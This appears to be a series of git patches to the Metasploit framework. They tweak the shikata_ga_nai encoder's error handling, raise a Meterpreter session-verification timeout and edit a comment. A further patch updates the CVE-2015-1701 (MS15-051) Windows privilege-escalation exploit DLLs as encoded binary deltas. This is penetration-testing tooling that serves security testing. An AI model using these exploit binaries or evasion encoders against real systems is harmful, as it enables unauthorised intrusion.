 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb
index 3a12766a2f..14487f60bc 100644
--- a/modules/encoders/x86/shikata_ga_nai.rb
+++ b/modules/encoders/x86/shikata_ga_nai.rb
@@ -281,8 +281,9 @@ protected
     begin
       # Generate a permutation saving the ECX, ESP, and user defined registers
       loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
-    rescue EncodingError => e
-      raise EncodingError
+    rescue RuntimeError, EncodingError => e
+      # The Rex::Poly block generator can raise RuntimeError variants
+      raise EncodingError, e.to_s
     end
   end
 

From 2807fb4f93d8013921dfd7642ae146c01113ced4 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 24 Jun 2015 16:15:01 -0500
Subject: [PATCH 0547/1013] Bump the default timeout to 30 seconds based on
 feedback

---
 lib/msf/base/sessions/meterpreter_options.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index 0d8c7b3b70..789f25c801 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -13,7 +13,7 @@ module MeterpreterOptions
       [
         OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
         OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
-        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 10]),
+        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]),
         OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
         OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),

From 24a6e4c1106ccbeaaaf268d41aaecbfe625ff07d Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 24 Jun 2015 16:33:07 -0500
Subject: [PATCH 0548/1013] Comment update

---
 lib/rex/post/meterpreter/client_core.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 48333cdde8..e144707c4f 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -320,7 +320,9 @@ class ClientCore < Extension
 
     # Normalise the format of the incoming machine id so that it's consistent
     # regardless of case and leading/trailing spaces. This means that the
-    # individual meterpreters don't have to care
+    # individual meterpreters don't have to care.
+
+    # Note that the machine ID may be blank or nil and that is OK
     Rex::Text.md5(mid.to_s.downcase.strip)
   end
 

From 4fc4cd86db83a2a6573183de2b14b76270d3a710 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 25 Jun 2015 09:28:38 +1000
Subject: [PATCH 0549/1013] Update exploit binaries for ms15-051

---
 .../CVE-2015-1701/cve-2015-1701.x64.dll       | Bin 84992 -> 84992 bytes
 .../CVE-2015-1701/cve-2015-1701.x86.dll       | Bin 72192 -> 72192 bytes
 2 files changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
index e049e41ec77c819496d5a1d2ccaaae216d5f11af..0aa4a0913bd4526902f38d476a7ebb3c51df7f4f 100755
GIT binary patch
delta 4483
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

delta 4585
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

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
index 2dd92ae5f5b1745e9b24f20a7b13ba0d347a5716..6fe8681520f2ea1229333f023ddabcc3d4303d99 100755
GIT binary patch
delta 11536
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
